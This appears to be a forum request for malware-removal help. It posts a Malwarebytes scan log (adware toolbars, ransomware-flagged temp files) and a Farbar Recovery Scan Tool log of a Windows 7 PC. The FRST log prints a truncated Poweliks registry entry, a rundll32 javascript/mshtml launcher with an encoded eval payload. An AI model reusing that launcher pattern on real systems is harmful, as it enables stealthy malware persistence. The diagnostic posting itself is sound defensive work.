
Another dllhost.exe*32 COM Surrogate issue



Here is the Malwarebytes Anti-Malware scan:
 

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 11/11/2014
Scan Time: 3:46:02 PM
Logfile: malwarebytes.txt
Administrator: Yes
 
Version: 2.00.3.1025
Malware Database: v2014.11.11.08
Rootkit Database: v2014.11.11.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled
 
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Swintal
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 428473
Time Elapsed: 20 min, 45 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 33
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\TYPELIB\{EC4085F2-8DB3-45a6-AD0B-CA289F3C5D7E}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{0FA32667-9A8A-4E9C-902F-CA3323180003}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{2A42D13C-D427-4787-821B-CF6973855778}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{6B458F62-592F-4B25-8967-E6A350A59328}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{0FA32667-9A8A-4E9C-902F-CA3323180003}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{2A42D13C-D427-4787-821B-CF6973855778}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{6B458F62-592F-4B25-8967-E6A350A59328}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{EC4085F2-8DB3-45a6-AD0B-CA289F3C5D7E}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\TBSB07898.IEToolbar.1, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\TBSB07898.IEToolbar, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TBSB07898.IEToolbar, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TBSB07898.IEToolbar.1, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKU\S-1-5-21-4134620719-2527629264-1752102789-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKU\S-1-5-21-4134620719-2527629264-1752102789-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{FCBCCB87-9224-4B8D-B117-F56D924BEB18}, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\CLASSES\Toolbar3.TBSB07898.1, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\CLASSES\Toolbar3.TBSB07898, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Toolbar3.TBSB07898, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{FCBCCB87-9224-4B8D-B117-F56D924BEB18}, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Toolbar3.TBSB07898.1, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
PUP.Optional.BestToolbar.A, HKU\S-1-5-21-4134620719-2527629264-1752102789-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{FCBCCB87-9224-4B8D-B117-F56D924BEB18}, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
PUP.Optional.BestToolbar.A, HKU\S-1-5-21-4134620719-2527629264-1752102789-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{FCBCCB87-9224-4B8D-B117-F56D924BEB18}, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
 
Registry Values: 2
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\TOOLBAR|{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [394bb684f488b383c8367b3b8d758080], 
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 3
Trojan.Ransom.ED, C:\Users\Swintal\AppData\Local\Temp\2A9C.tmp, Quarantined, [404476c47b015cdab8b442a036cb8080], 
Trojan.Agent, C:\Users\Swintal\AppData\Local\Temp\FlyTampa_Libraries_FSX_P3D.exe, Quarantined, [8bf998a2413bd363f57b8bd7f0103ac6], 
Trojan.Ransom.ED, C:\Users\Swintal\AppData\Local\Temp\2B47.tmp, Quarantined, [800484b6c5b7d660de8ea939738e867a], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-11-2014

Ran by Swintal (administrator) on SWINTAL-PC on 11-11-2014 21:37:28

Running from C:\Users\Swintal\Desktop

Loaded Profile: Swintal (Available profiles: Swintal & Brian)

Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)

Internet Explorer Version 11

Boot Mode: Normal


 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe

(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe

(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

() C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe

(ESET) C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe

(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe

(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe

(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe

(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe

(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe

(Microsoft Corporation) C:\Windows\System32\msiexec.exe

(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE

(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\msosync.exe

(Microsoft Corporation) C:\Windows\System32\wbengine.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe

(ESET) C:\Program Files\ESET\ESET Smart Security\egui.exe

(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe

(Hewlett-Packard Co.) C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe

(Google Inc.) C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe

(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe

(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe

(PI Engineering) C:\Program Files (x86)\PI Engineering\MacroWorks 3.1\MacroWorks 3r.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe

(Navigraph) C:\Program Files (x86)\Navigraph\FMS Data Manager\NGFMSAgent.exe

(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe

(Apple Inc.) E:\iTunes\iTunesHelper.exe

(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe

(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe

(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe

(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

(Microsoft Corporation) C:\Windows\System32\vds.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe

(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleChromeDAV.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Hewlett-Packard Co.) C:\Program Files\HP\HP ENVY 4500 series\Bin\HPNetworkCommunicatorCom.exe

 

 

==================== Registry (Whitelisted) ==================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7188552 2013-05-27] (Realtek Semiconductor)

HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch

HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2464072 2014-11-06] (NVIDIA Corporation)

HKLM\...\Run: [shadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart

HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET Smart Security\egui.exe [5595336 2014-10-01] (ESET)

HKLM-x32\...\Run: [uSB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-25] (Intel Corporation)

HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [Navigraph FMS Data Manager] => C:\Program Files (x86)\Navigraph\FMS Data Manager\NGFMSAgent.exe [1006576 2014-06-03] (Navigraph)

HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)

HKLM-x32\...\Run: [] => [X]

HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)

HKLM-x32\...\Run: [iTunesHelper] => E:\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [688984 2014-07-23] (Garmin Ltd or its subsidiaries)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [GoogleDriveSync] => C:\Program Files (x86)\Google\Drive\googledrivesync.exe [22869088 2014-10-21] (Google)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [HP ENVY 4500 series (NET)] => C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe [3487240 2014-03-06] (Hewlett-Packard Co.)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [Google Update] => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2014-08-10] (Google Inc.)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [Google+ Auto Backup] => C:\Users\Swintal\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe [3746120 2014-08-12] (Google Inc.)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [43816 2014-10-17] (Apple Inc.)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [43816 2014-10-17] (Apple Inc.)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [iCloudDrive] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe [43816 2014-10-20] (Apple Inc.)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

HKU\S-1-5-18\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [688984 2014-07-23] (Garmin Ltd or its subsidiaries)

Startup: C:\Users\Swintal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MacroWorks 3.1.lnk

ShortcutTarget: MacroWorks 3.1.lnk -> C:\Program Files (x86)\PI Engineering\MacroWorks 3.1\MacroWorks 3r.exe (PI Engineering)

ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation)

ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation)

ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation)

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION

SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={sear

SearchScopes: HKCU - {96bd48dd-741b-41ae-ac4a-aff96ba00f7e} URL = http://search.coupons.com/search.asp?p=df&q={searchTerms}

BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll (Microsoft Corporation)

BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)

BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL (Microsoft Corporation)

BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation)

BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)

BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)

BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation)

BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation)

DPF: HKLM-x32 {0D41B8C5-2599-4893-8183-00195EC8D5F9} http://support.asus.com/select/asusTek_sys_ctrl3.cab

DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://blueconnect.jetblue.com/dana-cached/sc/JuniperSetupClient.cab

Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation)

Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\MSOSB.DLL (Microsoft Corporation)

Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62

 

FireFox:

========

FF Plugin: @microsoft.com/GENUINE -> disabled No File

FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation)

FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> E:\iTunes\Mozilla Plugins\npitunes.dll ()

FF Plugin-x32: @canon.com/MycameraPlugin -> C:\Program Files (x86)\Canon\MyCamera Download Plugin\NPCIG.dll (CANON INC.)

FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)

FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)

FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File

FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\NPSPWRAP.DLL (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)

FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

FF Plugin HKU\S-1-5-21-4134620719-2527629264-1752102789-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin HKU\S-1-5-21-4134620719-2527629264-1752102789-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

 

Chrome: 

=======

CHR HomePage: Default -> hxxp://www.google.com

CHR StartupUrls: Default -> "hxxp://www.google.com"

CHR Profile: C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default

CHR Extension: (Google Drive) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-03-16]

CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-13]

CHR Extension: (DoNotTrackMe: Online Privacy Protection) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\epanfjkfahimkgomnigadpkobaefekcd [2014-07-18]

CHR Extension: (iCloud Bookmarks) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\fkepacicchenbjecpbpbclokcabebhah [2014-10-03]

CHR Extension: (Hide My Ass) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmjonpeiaiacbgfgemlchebljmfgjnmh [2014-07-18]

CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2014-11-06]

CHR Extension: (WeatherBug) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\njkkjobcechefaoknodniidfjapgfoco [2014-07-18]

CHR Extension: (Google Wallet) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-03-01]

 

==================== Services (Whitelisted) =================

 

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

 

R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe [927232 2012-10-29] ()

R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2436280 2014-09-25] (Microsoft Corporation)

R2 ekrn; C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe [1349576 2014-10-01] (ESET)

R2 Garmin Core Update Service; C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [438616 2014-07-23] (Garmin Ltd or its subsidiaries)

R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1148744 2014-11-06] (NVIDIA Corporation)

S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]

R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)

R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation) [File not signed]

R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1795912 2014-11-06] (NVIDIA Corporation)

R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [19819848 2014-11-06] (NVIDIA Corporation)

 

==================== Drivers (Whitelisted) ====================

 

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

 

R0 asahci64; C:\Windows\System32\DRIVERS\asahci64.sys [47512 2013-01-10] (Asmedia Technology)

R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2012-08-21] ()

R3 e1dexpress; C:\Windows\System32\DRIVERS\e1d62x64.sys [496400 2013-02-26] (Intel Corporation)

R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [243440 2014-08-18] (ESET)

U5 edevmon; C:\Windows\System32\Drivers\edevmon.sys [241368 2014-08-18] (ESET)

R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [169280 2014-08-18] (ESET)

